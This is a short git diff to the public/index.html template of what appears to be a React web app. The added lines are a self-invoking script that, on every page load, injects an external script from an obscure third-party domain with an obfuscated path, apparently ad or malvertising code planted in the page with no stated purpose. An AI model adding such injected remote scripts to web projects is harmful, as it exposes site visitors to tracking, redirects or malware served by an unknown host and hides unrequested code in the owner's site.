--- a/public/index.html
+++ b/public/index.html
@@ -36,6 +36,18 @@
   <body>
    
     <div id="root"></div>
+    <script>
+(function(pzn){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = pzn || {};
+s.src = "\/\/verifiablebreast.com\/bLXfV.sFdsGgle0xYzWQch\/keLma9wuLZ\/U\/lHkDPoTUYR1\/MNz\/Y\/z\/OvDGQ_teN\/jkUxzbN_jvMz4YNvQP";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
     <!--
       This HTML file is a template.
       If you open it directly in the browser, you will see an empty page.
